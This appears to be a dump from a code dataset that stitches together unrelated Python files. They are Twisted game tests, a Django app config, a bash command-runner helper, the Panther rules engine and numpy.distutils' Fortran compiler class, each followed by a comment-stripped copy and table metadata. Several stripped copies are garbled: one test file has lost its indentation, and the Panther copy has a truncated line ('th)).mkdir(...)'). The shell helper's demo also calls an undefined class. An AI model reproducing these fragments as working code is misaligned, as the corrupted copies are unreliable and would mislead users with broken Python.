        self.assertEquals(self.transport.value(), "Hi\nHi\nHi\n")
        self.player.send(i for i in ("Hi", "\n"))
        self.assertEquals(self.transport.value(), "Hi\nHi\nHi\nHi\n")
    def testDisconnect(self):
        """Disconnecting detaches the intelligence from the actor."""
        self.player.proto.terminal = None
        self.player.disconnect()
        self.assertIdentical(self.actor.getIntelligence(), None)
    def test_ambiguity(self):
        """
        When the player refers to something ambiguously, the error message
        should enumerate the objects in question.
        """
        for color in [u'red', u'green', u'blue']:
            it = objects.Thing(store=self.store, name=u'%s thing' % (color,))
            it.moveTo(self.room)
        self.player.parse("take thing")
        self.assertEquals(self.transport.value(),
                          "> take thing\n"
                          "Could you be more specific? When you said 'thing', "
                          "did you mean: a red thing, a green thing, "
                          "or a blue thing?\r\n")
| 31.5 | 80 | 0.610884 |
from twisted.trial import unittest
from axiom import store
from imaginary import objects
from imaginary.objects import Container
from imaginary.wiring import player
class PlayerTest(unittest.TestCase):
def setUp(self):
self.store = store.Store()
self.bob = objects.Thing(store=self.store, name=u"bob")
self.room = objects.Thing(store=self.store, name=u"a place")
roomContainer = Container.createFor(self.room, capacity=1000)
self.bob.moveTo(roomContainer)
self.actor = objects.Actor.createFor(self.bob)
self.player = player.Player(self.bob)
self.player.useColors = False
from twisted.test.proto_helpers import StringTransport
self.transport = StringTransport()
class Protocol:
write = self.transport.write
self.player.setProtocol(Protocol())
def testSend(self):
self.player.send("Hi\n")
self.assertEquals(self.transport.value(), "Hi\n")
self.player.send(("Hi", "\n"))
self.assertEquals(self.transport.value(), "Hi\nHi\n")
self.player.send(["Hi", "\n"])
self.assertEquals(self.transport.value(), "Hi\nHi\nHi\n")
self.player.send(i for i in ("Hi", "\n"))
self.assertEquals(self.transport.value(), "Hi\nHi\nHi\nHi\n")
def testDisconnect(self):
self.player.proto.terminal = None
self.player.disconnect()
self.assertIdentical(self.actor.getIntelligence(), None)
def test_ambiguity(self):
for color in [u'red', u'green', u'blue']:
it = objects.Thing(store=self.store, name=u'%s thing' % (color,))
it.moveTo(self.room)
self.player.parse("take thing")
self.assertEquals(self.transport.value(),
"> take thing\n"
"Could you be more specific? When you said 'thing', "
"did you mean: a red thing, a green thing, "
"or a blue thing?\r\n")
| true | true |
1c3068ae89b9a09ec68be9a9b0bf737c91b9fe3b | 97 | py | Python | usercontrol/apps.py | MinisterioPublicoRJ/mpplus | 23501db772172567c8d421c7af69ec43cddf1c20 | [
"MIT"
] | 1 | 2019-03-05T12:02:38.000Z | 2019-03-05T12:02:38.000Z | usercontrol/apps.py | MinisterioPublicoRJ/mpplus | 23501db772172567c8d421c7af69ec43cddf1c20 | [
"MIT"
] | 8 | 2020-02-11T23:14:48.000Z | 2022-02-10T10:53:19.000Z | usercontrol/apps.py | MinisterioPublicoRJ/mpplus | 23501db772172567c8d421c7af69ec43cddf1c20 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class UsercontrolConfig(AppConfig):
    """Django application configuration for the ``usercontrol`` app."""
    name = 'usercontrol'
| 16.166667 | 35 | 0.773196 | from django.apps import AppConfig
class UsercontrolConfig(AppConfig):
name = 'usercontrol'
| true | true |
1c3068b6efd9b527ae085460f22dc74a7f634a57 | 970 | py | Python | fei_webhook/app_webhook/shell_cmd.py | colingong/fei_webhook | 2acb8b8e36d05f87f06dcc1bf056beb92a41b157 | [
"Apache-2.0"
] | null | null | null | fei_webhook/app_webhook/shell_cmd.py | colingong/fei_webhook | 2acb8b8e36d05f87f06dcc1bf056beb92a41b157 | [
"Apache-2.0"
] | 6 | 2021-03-19T09:41:23.000Z | 2022-02-10T11:13:35.000Z | fei_webhook/app_webhook/shell_cmd.py | colingong/fei_webhook | 2acb8b8e36d05f87f06dcc1bf056beb92a41b157 | [
"Apache-2.0"
] | null | null | null | """执行shell cmd
"""
from subprocess import Popen, PIPE
from main_settings.settings import REPOS_PARENT_DIR
class Cmds(object):
    """Run a sequence of shell commands in a single ``bash`` session.

    All commands share one shell process, so state such as the working
    directory (``cd``) carries over from one command to the next.
    """

    def __init__(self, cmds):
        # cmds: iterable of shell command strings, executed in order.
        self.cmds = cmds
        self.repos_parent_dir = REPOS_PARENT_DIR

    def run(self):
        """Execute all commands and return ``(stdout, stderr)`` as text.

        Uses ``communicate()`` so both pipes are drained concurrently --
        the previous implementation read stdout to EOF before touching
        stderr, which can deadlock when a command fills the stderr pipe
        -- and so the child process is waited on instead of being left
        as a zombie.
        """
        process = Popen('bash', shell=False, universal_newlines=True,
                        stdin=PIPE, stdout=PIPE, stderr=PIPE)
        script = ''.join(cmd + '\n' for cmd in self.cmds)
        out, err = process.communicate(script)
        return out, err
if __name__ == '__main__':
    # NOTE(review): a relative import ("from ..main_settings...") can never
    # work when this module runs as a script; use the same absolute import
    # style as the top of the file.
    from main_settings.settings import BASE_DIR
    cmds = [
        'pwpd',  # NOTE(review): looks like a typo for 'pwd', but it may be
                 # a deliberate error-output probe -- confirm before fixing
        'cd ../..',
        'pwd ',
        'cd ' + BASE_DIR,
        'pwd',
        'cd not_use',
        'pwd',
    ]
    # The class defined above is ``Cmds``; the previous ``ExcuteCmds`` name
    # was undefined and raised NameError when the script ran.
    runner = Cmds(cmds)
    out, err = runner.run()
    print(out)
    print(err)
# print(r.__call__()) | 23.658537 | 69 | 0.542268 | from subprocess import Popen, PIPE
from main_settings.settings import REPOS_PARENT_DIR
class Cmds(object):
def __init__(self, cmds):
self.cmds = cmds
self.repos_parent_dir = REPOS_PARENT_DIR
def run(self):
process = Popen('bash', shell=False, universal_newlines=True,
stdin=PIPE, stdout=PIPE, stderr=PIPE)
for cmd in self.cmds:
process.stdin.write(cmd + '\n')
process.stdin.close()
out = process.stdout.read()
err = process.stderr.read()
return out, err
if __name__ == '__main__':
from ..main_settings.settings import BASE_DIR
cmds = [
'pwpd',
'cd ../..',
'pwd ',
'cd ' + BASE_DIR,
'pwd',
'cd not_use',
'pwd',
]
r = ExcuteCmds(cmds)
out, err = r.run()
print(out)
print(err)
| true | true |
1c3068e44147e3e52a0e984de1b23a558a13e8fb | 3,883 | py | Python | internal/log_analysis/rules_engine/src/rule.py | stoggi/panther | 72532101a201d26c03061b6ea4fc8092995e210f | [
"Apache-2.0"
] | 2 | 2021-12-17T01:24:21.000Z | 2021-12-18T17:13:45.000Z | internal/log_analysis/rules_engine/src/rule.py | stoggi/panther | 72532101a201d26c03061b6ea4fc8092995e210f | [
"Apache-2.0"
] | null | null | null | internal/log_analysis/rules_engine/src/rule.py | stoggi/panther | 72532101a201d26c03061b6ea4fc8092995e210f | [
"Apache-2.0"
] | 5 | 2021-12-16T02:16:43.000Z | 2022-03-26T14:38:37.000Z | # Panther is a scalable, powerful, cloud-native SIEM written in Golang/React.
# Copyright (C) 2020 Panther Labs Inc
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import os
import sys
import tempfile
from importlib import util as import_util
from pathlib import Path
from typing import Any, Dict, Union
from .logging import get_logger
_RULE_FOLDER = os.path.join(tempfile.gettempdir(), 'rules')
# Rule with ID 'aws_globals' contains common Python logic used by other rules
COMMON_MODULE_RULE_ID = 'aws_globals'
class Rule:
    """Panther rule metadata and imported module."""

    logger = get_logger()

    def __init__(self, rule_id: str, rule_body: str) -> None:
        """Import rule contents from disk.

        Args:
            rule_id: Unique rule identifier
            rule_body: The rule body
        """
        self.rule_id = rule_id
        self._import_error = None
        try:
            self.store_rule(rule_id, rule_body)
            self._module = self.import_rule_as_module(rule_id)
        except Exception as err:  # pylint: disable=broad-except
            # Remember the failure; run() surfaces it for every event.
            self._import_error = err

    def store_rule(self, rule_id: str, rule_body: str) -> None:
        """Write the rule body to its on-disk module path."""
        target = self.rule_id_to_path(rule_id)
        self.logger.debug('storing rule in path {}'.format(target))
        # Make sure the parent directory exists before writing.
        parent = Path(os.path.dirname(target))
        parent.mkdir(parents=True, exist_ok=True)
        with open(target, 'w') as py_file:
            py_file.write(rule_body)

    def import_rule_as_module(self, rule_id: str) -> Any:
        """Dynamically import a Python module from a file.

        See also: https://docs.python.org/3/library/importlib.html#importing-a-source-file-directly
        """
        source_path = self.rule_id_to_path(rule_id)
        spec = import_util.spec_from_file_location(rule_id, source_path)
        module = import_util.module_from_spec(spec)
        spec.loader.exec_module(module)  # type: ignore
        self.logger.debug('imported module {} from path {}'.format(rule_id, source_path))
        if rule_id == COMMON_MODULE_RULE_ID:
            self.logger.debug('imported global module {} from path {}'.format(rule_id, source_path))
            # Register the shared module so other rules can import it.
            sys.modules[rule_id] = module
        return module

    def rule_id_to_path(self, rule_id: str) -> str:
        """Map a rule ID to the ``.py`` file it is stored under."""
        sanitized = ''.join(ch if self.allowed_char(ch) else '_' for ch in rule_id)
        return os.path.join(_RULE_FOLDER, sanitized + '.py')

    def allowed_char(self, char: str) -> bool:
        """Return true if the character is part of a valid rule ID."""
        if char.isalnum():
            return True
        return char in (' ', '-', '.')

    def run(self, event: Dict[str, Any]) -> Union[bool, Exception]:
        """Analyze a log line with this rule and return True, False, or an error."""
        if self._import_error:
            return self._import_error
        try:
            # Python source should have a method called "rule"
            matched = self._module.rule(event)
        except Exception as err:  # pylint: disable=broad-except
            return err
        if isinstance(matched, bool):
            return matched
        return Exception('rule returned {}, expected bool'.format(type(matched).__name__))
| 37.699029 | 99 | 0.662632 |
import os
import sys
import tempfile
from importlib import util as import_util
from pathlib import Path
from typing import Any, Dict, Union
from .logging import get_logger
_RULE_FOLDER = os.path.join(tempfile.gettempdir(), 'rules')
COMMON_MODULE_RULE_ID = 'aws_globals'
class Rule:
logger = get_logger()
def __init__(self, rule_id: str, rule_body: str) -> None:
self.rule_id = rule_id
self._import_error = None
try:
self.store_rule(rule_id, rule_body)
self._module = self.import_rule_as_module(rule_id)
except Exception as err:
self._import_error = err
def store_rule(self, rule_id: str, rule_body: str) -> None:
path = self.rule_id_to_path(rule_id)
self.logger.debug('storing rule in path {}'.format(path))
th)).mkdir(parents=True, exist_ok=True)
with open(path, 'w') as py_file:
py_file.write(rule_body)
def import_rule_as_module(self, rule_id: str) -> Any:
path = self.rule_id_to_path(rule_id)
spec = import_util.spec_from_file_location(rule_id, path)
mod = import_util.module_from_spec(spec)
spec.loader.exec_module(mod) # type: ignore
self.logger.debug('imported module {} from path {}'.format(rule_id, path))
if rule_id == COMMON_MODULE_RULE_ID:
self.logger.debug('imported global module {} from path {}'.format(rule_id, path))
# Importing it as a shared module
sys.modules[rule_id] = mod
return mod
def rule_id_to_path(self, rule_id: str) -> str:
safe_id = ''.join(x if self.allowed_char(x) else '_' for x in rule_id)
path = os.path.join(_RULE_FOLDER, safe_id + '.py')
return path
def allowed_char(self, char: str) -> bool:
return char.isalnum() or char in {' ', '-', '.'}
def run(self, event: Dict[str, Any]) -> Union[bool, Exception]:
if self._import_error:
return self._import_error
try:
# Python source should have a method called "rule"
matched = self._module.rule(event)
except Exception as err: # pylint: disable=broad-except
return err
if not isinstance(matched, bool):
return Exception('rule returned {}, expected bool'.format(type(matched).__name__))
return matched
| true | true |
1c3069363f84e2150f277a24369f3e3872ad0037 | 39,984 | py | Python | .venv/lib/python3.8/site-packages/numpy/distutils/fcompiler/__init__.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 115 | 2020-06-18T15:00:58.000Z | 2022-03-02T10:13:19.000Z | .venv/lib/python3.8/site-packages/numpy/distutils/fcompiler/__init__.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 88 | 2020-04-23T18:33:38.000Z | 2021-08-02T06:25:47.000Z | bot/lib/python3.7/site-packages/numpy/distutils/fcompiler/__init__.py | carlosrh18/DavinciBot | d73a6b7f68d7bab25d134d3f85c6b63a86c206c5 | [
"MIT"
] | 60 | 2020-07-22T14:53:10.000Z | 2022-03-23T10:17:59.000Z | """numpy.distutils.fcompiler
Contains FCompiler, an abstract base class that defines the interface
for the numpy.distutils Fortran compiler abstraction model.
Terminology:
To be consistent, where the term 'executable' is used, it means the single
file, like 'gcc', that is executed, and should be a string. In contrast,
'command' means the entire command line, like ['gcc', '-c', 'file.c'], and
should be a list.
But note that FCompiler.executables is actually a dictionary of commands.
"""
__all__ = ['FCompiler', 'new_fcompiler', 'show_fcompilers',
'dummy_fortran_file']
import os
import sys
import re
from numpy.compat import open_latin1
from distutils.sysconfig import get_python_lib
from distutils.fancy_getopt import FancyGetopt
from distutils.errors import DistutilsModuleError, \
DistutilsExecError, CompileError, LinkError, DistutilsPlatformError
from distutils.util import split_quoted, strtobool
from numpy.distutils.ccompiler import CCompiler, gen_lib_options
from numpy.distutils import log
from numpy.distutils.misc_util import is_string, all_strings, is_sequence, \
make_temp_file, get_shared_lib_extension
from numpy.distutils.exec_command import find_executable
from numpy.distutils import _shell_utils
from .environment import EnvironmentConfig
__metaclass__ = type
class CompilerNotFound(Exception):
    """Raised when no suitable Fortran compiler executable can be found."""
    pass
def flaglist(s):
    """Return *s* as a list of flags: split a string shell-style with
    ``split_quoted``; pass any other value through unchanged."""
    if not is_string(s):
        return s
    return split_quoted(s)
def str2bool(s):
    """Coerce *s* to a boolean value; string inputs are parsed with
    distutils' ``strtobool``, anything else goes through ``bool``."""
    return strtobool(s) if is_string(s) else bool(s)
def is_sequence_of_strings(seq):
    """Return True when *seq* is a sequence whose elements are all strings."""
    return is_sequence(seq) and all_strings(seq)
class FCompiler(CCompiler):
"""Abstract base class to define the interface that must be implemented
by real Fortran compiler classes.
Methods that subclasses may redefine:
update_executables(), find_executables(), get_version()
get_flags(), get_flags_opt(), get_flags_arch(), get_flags_debug()
get_flags_f77(), get_flags_opt_f77(), get_flags_arch_f77(),
get_flags_debug_f77(), get_flags_f90(), get_flags_opt_f90(),
get_flags_arch_f90(), get_flags_debug_f90(),
get_flags_fix(), get_flags_linker_so()
DON'T call these methods (except get_version) after
constructing a compiler instance or inside any other method.
All methods, except update_executables() and find_executables(),
may call the get_version() method.
After constructing a compiler instance, always call customize(dist=None)
method that finalizes compiler construction and makes the following
attributes available:
compiler_f77
compiler_f90
compiler_fix
linker_so
archiver
ranlib
libraries
library_dirs
"""
# These are the environment variables and distutils keys used.
# Each configuration description is
# (<hook name>, <environment variable>, <key in distutils.cfg>, <convert>, <append>)
# The hook names are handled by the self._environment_hook method.
# - names starting with 'self.' call methods in this class
# - names starting with 'exe.' return the key in the executables dict
# - names like 'flags.YYY' return self.get_flag_YYY()
# convert is either None or a function to convert a string to the
# appropriate type used.
distutils_vars = EnvironmentConfig(
distutils_section='config_fc',
noopt = (None, None, 'noopt', str2bool, False),
noarch = (None, None, 'noarch', str2bool, False),
debug = (None, None, 'debug', str2bool, False),
verbose = (None, None, 'verbose', str2bool, False),
)
command_vars = EnvironmentConfig(
distutils_section='config_fc',
compiler_f77 = ('exe.compiler_f77', 'F77', 'f77exec', None, False),
compiler_f90 = ('exe.compiler_f90', 'F90', 'f90exec', None, False),
compiler_fix = ('exe.compiler_fix', 'F90', 'f90exec', None, False),
version_cmd = ('exe.version_cmd', None, None, None, False),
linker_so = ('exe.linker_so', 'LDSHARED', 'ldshared', None, False),
linker_exe = ('exe.linker_exe', 'LD', 'ld', None, False),
archiver = (None, 'AR', 'ar', None, False),
ranlib = (None, 'RANLIB', 'ranlib', None, False),
)
flag_vars = EnvironmentConfig(
distutils_section='config_fc',
f77 = ('flags.f77', 'F77FLAGS', 'f77flags', flaglist, True),
f90 = ('flags.f90', 'F90FLAGS', 'f90flags', flaglist, True),
free = ('flags.free', 'FREEFLAGS', 'freeflags', flaglist, True),
fix = ('flags.fix', None, None, flaglist, False),
opt = ('flags.opt', 'FOPT', 'opt', flaglist, True),
opt_f77 = ('flags.opt_f77', None, None, flaglist, False),
opt_f90 = ('flags.opt_f90', None, None, flaglist, False),
arch = ('flags.arch', 'FARCH', 'arch', flaglist, False),
arch_f77 = ('flags.arch_f77', None, None, flaglist, False),
arch_f90 = ('flags.arch_f90', None, None, flaglist, False),
debug = ('flags.debug', 'FDEBUG', 'fdebug', flaglist, True),
debug_f77 = ('flags.debug_f77', None, None, flaglist, False),
debug_f90 = ('flags.debug_f90', None, None, flaglist, False),
flags = ('self.get_flags', 'FFLAGS', 'fflags', flaglist, True),
linker_so = ('flags.linker_so', 'LDFLAGS', 'ldflags', flaglist, True),
linker_exe = ('flags.linker_exe', 'LDFLAGS', 'ldflags', flaglist, True),
ar = ('flags.ar', 'ARFLAGS', 'arflags', flaglist, True),
)
language_map = {'.f': 'f77',
'.for': 'f77',
'.F': 'f77', # XXX: needs preprocessor
'.ftn': 'f77',
'.f77': 'f77',
'.f90': 'f90',
'.F90': 'f90', # XXX: needs preprocessor
'.f95': 'f90',
}
language_order = ['f90', 'f77']
# These will be set by the subclass
compiler_type = None
compiler_aliases = ()
version_pattern = None
possible_executables = []
executables = {
'version_cmd': ["f77", "-v"],
'compiler_f77': ["f77"],
'compiler_f90': ["f90"],
'compiler_fix': ["f90", "-fixed"],
'linker_so': ["f90", "-shared"],
'linker_exe': ["f90"],
'archiver': ["ar", "-cr"],
'ranlib': None,
}
# If compiler does not support compiling Fortran 90 then it can
# suggest using another compiler. For example, gnu would suggest
# gnu95 compiler type when there are F90 sources.
suggested_f90_compiler = None
compile_switch = "-c"
object_switch = "-o " # Ending space matters! It will be stripped
# but if it is missing then object_switch
# will be prefixed to object file name by
# string concatenation.
library_switch = "-o " # Ditto!
# Switch to specify where module files are created and searched
# for USE statement. Normally it is a string and also here ending
# space matters. See above.
module_dir_switch = None
# Switch to specify where module files are searched for USE statement.
module_include_switch = '-I'
pic_flags = [] # Flags to create position-independent code
src_extensions = ['.for', '.ftn', '.f77', '.f', '.f90', '.f95', '.F', '.F90', '.FOR']
obj_extension = ".o"
shared_lib_extension = get_shared_lib_extension()
static_lib_extension = ".a" # or .lib
static_lib_format = "lib%s%s" # or %s%s
shared_lib_format = "%s%s"
exe_extension = ""
_exe_cache = {}
_executable_keys = ['version_cmd', 'compiler_f77', 'compiler_f90',
'compiler_fix', 'linker_so', 'linker_exe', 'archiver',
'ranlib']
# This will be set by new_fcompiler when called in
# command/{build_ext.py, build_clib.py, config.py} files.
c_compiler = None
# extra_{f77,f90}_compile_args are set by build_ext.build_extension method
extra_f77_compile_args = []
extra_f90_compile_args = []
def __init__(self, *args, **kw):
CCompiler.__init__(self, *args, **kw)
self.distutils_vars = self.distutils_vars.clone(self._environment_hook)
self.command_vars = self.command_vars.clone(self._environment_hook)
self.flag_vars = self.flag_vars.clone(self._environment_hook)
self.executables = self.executables.copy()
for e in self._executable_keys:
if e not in self.executables:
self.executables[e] = None
# Some methods depend on .customize() being called first, so
# this keeps track of whether that's happened yet.
self._is_customised = False
def __copy__(self):
obj = self.__new__(self.__class__)
obj.__dict__.update(self.__dict__)
obj.distutils_vars = obj.distutils_vars.clone(obj._environment_hook)
obj.command_vars = obj.command_vars.clone(obj._environment_hook)
obj.flag_vars = obj.flag_vars.clone(obj._environment_hook)
obj.executables = obj.executables.copy()
return obj
def copy(self):
return self.__copy__()
# Use properties for the attributes used by CCompiler. Setting them
# as attributes from the self.executables dictionary is error-prone,
# so we get them from there each time.
def _command_property(key):
def fget(self):
assert self._is_customised
return self.executables[key]
return property(fget=fget)
version_cmd = _command_property('version_cmd')
compiler_f77 = _command_property('compiler_f77')
compiler_f90 = _command_property('compiler_f90')
compiler_fix = _command_property('compiler_fix')
linker_so = _command_property('linker_so')
linker_exe = _command_property('linker_exe')
archiver = _command_property('archiver')
ranlib = _command_property('ranlib')
# Make our terminology consistent.
def set_executable(self, key, value):
self.set_command(key, value)
def set_commands(self, **kw):
for k, v in kw.items():
self.set_command(k, v)
def set_command(self, key, value):
if not key in self._executable_keys:
raise ValueError(
"unknown executable '%s' for class %s" %
(key, self.__class__.__name__))
if is_string(value):
value = split_quoted(value)
assert value is None or is_sequence_of_strings(value[1:]), (key, value)
self.executables[key] = value
######################################################################
## Methods that subclasses may redefine. But don't call these methods!
## They are private to FCompiler class and may return unexpected
## results if used elsewhere. So, you have been warned..
def find_executables(self):
"""Go through the self.executables dictionary, and attempt to
find and assign appropriate executables.
Executable names are looked for in the environment (environment
variables, the distutils.cfg, and command line), the 0th-element of
the command list, and the self.possible_executables list.
Also, if the 0th element is "<F77>" or "<F90>", the Fortran 77
or the Fortran 90 compiler executable is used, unless overridden
by an environment setting.
Subclasses should call this if overridden.
"""
assert self._is_customised
exe_cache = self._exe_cache
def cached_find_executable(exe):
if exe in exe_cache:
return exe_cache[exe]
fc_exe = find_executable(exe)
exe_cache[exe] = exe_cache[fc_exe] = fc_exe
return fc_exe
def verify_command_form(name, value):
if value is not None and not is_sequence_of_strings(value):
raise ValueError(
"%s value %r is invalid in class %s" %
(name, value, self.__class__.__name__))
def set_exe(exe_key, f77=None, f90=None):
cmd = self.executables.get(exe_key, None)
if not cmd:
return None
# Note that we get cmd[0] here if the environment doesn't
# have anything set
exe_from_environ = getattr(self.command_vars, exe_key)
if not exe_from_environ:
possibles = [f90, f77] + self.possible_executables
else:
possibles = [exe_from_environ] + self.possible_executables
seen = set()
unique_possibles = []
for e in possibles:
if e == '<F77>':
e = f77
elif e == '<F90>':
e = f90
if not e or e in seen:
continue
seen.add(e)
unique_possibles.append(e)
for exe in unique_possibles:
fc_exe = cached_find_executable(exe)
if fc_exe:
cmd[0] = fc_exe
return fc_exe
self.set_command(exe_key, None)
return None
ctype = self.compiler_type
f90 = set_exe('compiler_f90')
if not f90:
f77 = set_exe('compiler_f77')
if f77:
log.warn('%s: no Fortran 90 compiler found' % ctype)
else:
raise CompilerNotFound('%s: f90 nor f77' % ctype)
else:
f77 = set_exe('compiler_f77', f90=f90)
if not f77:
log.warn('%s: no Fortran 77 compiler found' % ctype)
set_exe('compiler_fix', f90=f90)
set_exe('linker_so', f77=f77, f90=f90)
set_exe('linker_exe', f77=f77, f90=f90)
set_exe('version_cmd', f77=f77, f90=f90)
set_exe('archiver')
set_exe('ranlib')
def update_executables(self):
"""Called at the beginning of customisation. Subclasses should
override this if they need to set up the executables dictionary.
Note that self.find_executables() is run afterwards, so the
self.executables dictionary values can contain <F77> or <F90> as
the command, which will be replaced by the found F77 or F90
compiler.
"""
pass
def get_flags(self):
"""List of flags common to all compiler types."""
return [] + self.pic_flags
def _get_command_flags(self, key):
cmd = self.executables.get(key, None)
if cmd is None:
return []
return cmd[1:]
def get_flags_f77(self):
"""List of Fortran 77 specific flags."""
return self._get_command_flags('compiler_f77')
def get_flags_f90(self):
"""List of Fortran 90 specific flags."""
return self._get_command_flags('compiler_f90')
def get_flags_free(self):
"""List of Fortran 90 free format specific flags."""
return []
def get_flags_fix(self):
"""List of Fortran 90 fixed format specific flags."""
return self._get_command_flags('compiler_fix')
def get_flags_linker_so(self):
"""List of linker flags to build a shared library."""
return self._get_command_flags('linker_so')
def get_flags_linker_exe(self):
"""List of linker flags to build an executable."""
return self._get_command_flags('linker_exe')
def get_flags_ar(self):
"""List of archiver flags. """
return self._get_command_flags('archiver')
def get_flags_opt(self):
"""List of architecture independent compiler flags."""
return []
def get_flags_arch(self):
"""List of architecture dependent compiler flags."""
return []
def get_flags_debug(self):
"""List of compiler flags to compile with debugging information."""
return []
get_flags_opt_f77 = get_flags_opt_f90 = get_flags_opt
get_flags_arch_f77 = get_flags_arch_f90 = get_flags_arch
get_flags_debug_f77 = get_flags_debug_f90 = get_flags_debug
def get_libraries(self):
"""List of compiler libraries."""
return self.libraries[:]
def get_library_dirs(self):
"""List of compiler library directories."""
return self.library_dirs[:]
def get_version(self, force=False, ok_status=[0]):
assert self._is_customised
version = CCompiler.get_version(self, force=force, ok_status=ok_status)
if version is None:
raise CompilerNotFound()
return version
############################################################
## Public methods:
def customize(self, dist = None):
"""Customize Fortran compiler.
This method gets Fortran compiler specific information from
(i) class definition, (ii) environment, (iii) distutils config
files, and (iv) command line (later overrides earlier).
This method should be always called after constructing a
compiler instance. But not in __init__ because Distribution
instance is needed for (iii) and (iv).
"""
log.info('customize %s' % (self.__class__.__name__))
self._is_customised = True
self.distutils_vars.use_distribution(dist)
self.command_vars.use_distribution(dist)
self.flag_vars.use_distribution(dist)
self.update_executables()
# find_executables takes care of setting the compiler commands,
# version_cmd, linker_so, linker_exe, ar, and ranlib
self.find_executables()
noopt = self.distutils_vars.get('noopt', False)
noarch = self.distutils_vars.get('noarch', noopt)
debug = self.distutils_vars.get('debug', False)
f77 = self.command_vars.compiler_f77
f90 = self.command_vars.compiler_f90
f77flags = []
f90flags = []
freeflags = []
fixflags = []
if f77:
f77 = _shell_utils.NativeParser.split(f77)
f77flags = self.flag_vars.f77
if f90:
f90 = _shell_utils.NativeParser.split(f90)
f90flags = self.flag_vars.f90
freeflags = self.flag_vars.free
# XXX Assuming that free format is default for f90 compiler.
fix = self.command_vars.compiler_fix
# NOTE: this and similar examples are probably just
# excluding --coverage flag when F90 = gfortran --coverage
# instead of putting that flag somewhere more appropriate
# this and similar examples where a Fortran compiler
# environment variable has been customized by CI or a user
# should perhaps eventually be more thoroughly tested and more
# robustly handled
if fix:
fix = _shell_utils.NativeParser.split(fix)
fixflags = self.flag_vars.fix + f90flags
oflags, aflags, dflags = [], [], []
# examine get_flags_<tag>_<compiler> for extra flags
# only add them if the method is different from get_flags_<tag>
def get_flags(tag, flags):
# note that self.flag_vars.<tag> calls self.get_flags_<tag>()
flags.extend(getattr(self.flag_vars, tag))
this_get = getattr(self, 'get_flags_' + tag)
for name, c, flagvar in [('f77', f77, f77flags),
('f90', f90, f90flags),
('f90', fix, fixflags)]:
t = '%s_%s' % (tag, name)
if c and this_get is not getattr(self, 'get_flags_' + t):
flagvar.extend(getattr(self.flag_vars, t))
if not noopt:
get_flags('opt', oflags)
if not noarch:
get_flags('arch', aflags)
if debug:
get_flags('debug', dflags)
fflags = self.flag_vars.flags + dflags + oflags + aflags
if f77:
self.set_commands(compiler_f77=f77+f77flags+fflags)
if f90:
self.set_commands(compiler_f90=f90+freeflags+f90flags+fflags)
if fix:
self.set_commands(compiler_fix=fix+fixflags+fflags)
#XXX: Do we need LDSHARED->SOSHARED, LDFLAGS->SOFLAGS
linker_so = self.linker_so
if linker_so:
linker_so_flags = self.flag_vars.linker_so
if sys.platform.startswith('aix'):
python_lib = get_python_lib(standard_lib=1)
ld_so_aix = os.path.join(python_lib, 'config', 'ld_so_aix')
python_exp = os.path.join(python_lib, 'config', 'python.exp')
linker_so = [ld_so_aix] + linker_so + ['-bI:'+python_exp]
self.set_commands(linker_so=linker_so+linker_so_flags)
linker_exe = self.linker_exe
if linker_exe:
linker_exe_flags = self.flag_vars.linker_exe
self.set_commands(linker_exe=linker_exe+linker_exe_flags)
ar = self.command_vars.archiver
if ar:
arflags = self.flag_vars.ar
self.set_commands(archiver=[ar]+arflags)
self.set_library_dirs(self.get_library_dirs())
self.set_libraries(self.get_libraries())
def dump_properties(self):
"""Print out the attributes of a compiler instance."""
props = []
for key in list(self.executables.keys()) + \
['version', 'libraries', 'library_dirs',
'object_switch', 'compile_switch']:
if hasattr(self, key):
v = getattr(self, key)
props.append((key, None, '= '+repr(v)))
props.sort()
pretty_printer = FancyGetopt(props)
for l in pretty_printer.generate_help("%s instance properties:" \
% (self.__class__.__name__)):
if l[:4]==' --':
l = ' ' + l[4:]
print(l)
###################
def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts):
"""Compile 'src' to product 'obj'."""
src_flags = {}
if is_f_file(src) and not has_f90_header(src):
flavor = ':f77'
compiler = self.compiler_f77
src_flags = get_f77flags(src)
extra_compile_args = self.extra_f77_compile_args or []
elif is_free_format(src):
flavor = ':f90'
compiler = self.compiler_f90
if compiler is None:
raise DistutilsExecError('f90 not supported by %s needed for %s'\
% (self.__class__.__name__, src))
extra_compile_args = self.extra_f90_compile_args or []
else:
flavor = ':fix'
compiler = self.compiler_fix
if compiler is None:
raise DistutilsExecError('f90 (fixed) not supported by %s needed for %s'\
% (self.__class__.__name__, src))
extra_compile_args = self.extra_f90_compile_args or []
if self.object_switch[-1]==' ':
o_args = [self.object_switch.strip(), obj]
else:
o_args = [self.object_switch.strip()+obj]
assert self.compile_switch.strip()
s_args = [self.compile_switch, src]
if extra_compile_args:
log.info('extra %s options: %r' \
% (flavor[1:], ' '.join(extra_compile_args)))
extra_flags = src_flags.get(self.compiler_type, [])
if extra_flags:
log.info('using compile options from source: %r' \
% ' '.join(extra_flags))
command = compiler + cc_args + extra_flags + s_args + o_args \
+ extra_postargs + extra_compile_args
display = '%s: %s' % (os.path.basename(compiler[0]) + flavor,
src)
try:
self.spawn(command, display=display)
except DistutilsExecError as e:
msg = str(e)
raise CompileError(msg)
def module_options(self, module_dirs, module_build_dir):
options = []
if self.module_dir_switch is not None:
if self.module_dir_switch[-1]==' ':
options.extend([self.module_dir_switch.strip(), module_build_dir])
else:
options.append(self.module_dir_switch.strip()+module_build_dir)
else:
print('XXX: module_build_dir=%r option ignored' % (module_build_dir))
print('XXX: Fix module_dir_switch for ', self.__class__.__name__)
if self.module_include_switch is not None:
for d in [module_build_dir]+module_dirs:
options.append('%s%s' % (self.module_include_switch, d))
else:
print('XXX: module_dirs=%r option ignored' % (module_dirs))
print('XXX: Fix module_include_switch for ', self.__class__.__name__)
return options
def library_option(self, lib):
return "-l" + lib
def library_dir_option(self, dir):
return "-L" + dir
def link(self, target_desc, objects,
